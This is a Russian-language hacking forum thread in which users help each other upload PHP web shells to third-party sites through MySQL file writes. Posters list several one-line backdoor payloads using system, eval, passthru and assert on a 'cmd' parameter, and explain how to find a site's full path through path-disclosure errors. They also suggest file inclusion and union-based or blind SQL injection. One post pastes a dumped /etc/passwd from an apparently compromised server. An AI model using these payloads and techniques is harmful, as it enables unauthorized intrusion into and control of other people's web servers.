Пытаюсь залить шелл средствами MySQL след. образом: Выдает такую ошибку: Путь /var/www/html/jcbi/docs/ точно существует. Помогите, пожалуйста, разобраться.
Т.е вот так нужно проверять? Там такая же ошибка вылазит... Кстати, подскажите, что значит вот это: "<?+system($_REQUEST['cmd']);+?>"? Почему именно параметр 'cmd'?
Ага, только щас system() не в моде, через него php-код не выполнишь(в некоторых случаях эта ф-я даже отключена).
Ну вот получу я шелл вида: site.ru/shell.php?cmd=phpinfo() и что дальше? Что в моде?) Через админку только?
И, если кому-то не сложно, напишите плиз как узнать полный путь для заливки шелла. Просто на глаза ничего подобного еще не попадалось.
Исчи баги с раскрытием пути под твой двиг, попробуй вызвать ошибку, глянь мб errrorlog криво лежит, пройдись гуглом по сайту.
В этом сезоне многие кутюрье, помимо <?system($_GET[cmd]);?>, который не всегда работает из-за отключенной функции system();, как верно подметил уважаемый Ereee, советуют носить бэкдоры следующего фасона: <? eval($_GET[cmd]); ?> <? passthru($_GET[cmd]); ?> <? eval($_REQUEST[cmd]); ?> <? passthru($_REQUEST[cmd]); ?> <? assert($_GET[cmd]); ?>
Помогите мне пожалуйста покажите мне где среди этого всего пароль юзера для подключения по ftp hsplusdesignbe:x:3456:101::/var/www/html:/ftponly sphera_pop:x:3456:101::/:/bin/sh root:x:0:0::/: bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin: shutdown:x:6:0:shutdown:/sbin: halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0perator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: gdm:x:42:42::/home/gdm: xfs:x:43:43:X Font Server:/etc/X11/fs: nobody:x:99:99:Nobody:/: ftp:x:3456:101::/ftp/pub/anonymous:/ftponly info:x:3456:101::/ftp/pub/info:/ftponly tsjaark:x:3456:101::/var/www/html/tsjaark:/ftponly test:x:3456:101::/ftp/pub/test:/ftponly
Facecontrol, у тебя есть читалка файлов на сервере (или как ты его получил?). Можешь почитать конфиги апача/сайта и т.д. Если это инклуд, то можешь исполнять свой код (возможно). Почитай об инклуде тут: _http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
Facecontrol, чтобы читать файлы сайта (т.е. исходники PHP, в т.ч. и конфиги) тебе нужно узнать внутренний путь сайта. Если кавычки не фильтруются, то можно попробовать залить шелл (опять же зная внутренний путь).
а чем ssl Может мешать твоей скуле? ошибки отключены значит error based не катит, пробуй стандартный метод union select, Или посимвольно
